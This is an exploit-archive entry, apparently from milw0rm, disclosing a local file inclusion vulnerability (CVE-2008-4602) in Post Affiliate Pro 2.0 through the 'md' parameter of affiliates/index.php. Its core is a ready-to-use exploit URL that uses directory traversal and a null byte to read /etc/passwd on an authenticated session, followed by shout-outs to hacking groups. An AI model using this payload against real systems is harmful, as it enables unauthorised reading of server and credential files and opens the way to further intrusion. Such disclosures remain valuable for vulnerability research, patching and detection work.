[] NeoSense

Post Affiliate Pro 2.0 - 'md' Local File Inclusion

Author: ZeN
type: webapps
platform: php
port: 
date_added: 2008-10-15 
date_updated: 2016-12-29 
verified: 1 
codes: OSVDB-49200;CVE-2008-4602 
tags: 
aliases:  
screenshot_url:  
application_url: 

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Software : Post Affiliate Pro v2.0
Vulnrability : Local File Inclusion
Severity : High

Author : ZeN
Date : 16 October 2008

Websites >
http://DUSecurity.com
http://DarkCode.me

PS : You MUST be logged into the system for the exploit to work.

Exploit >

http://site.com/affiliates/index.php?md=../../../../../../../etc/passwd%00


Shouts>
DUSecurity Group
DarkCode
WL-Group
IWannaHack
Milw0rm
EnigmaGroup

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2008-10-16]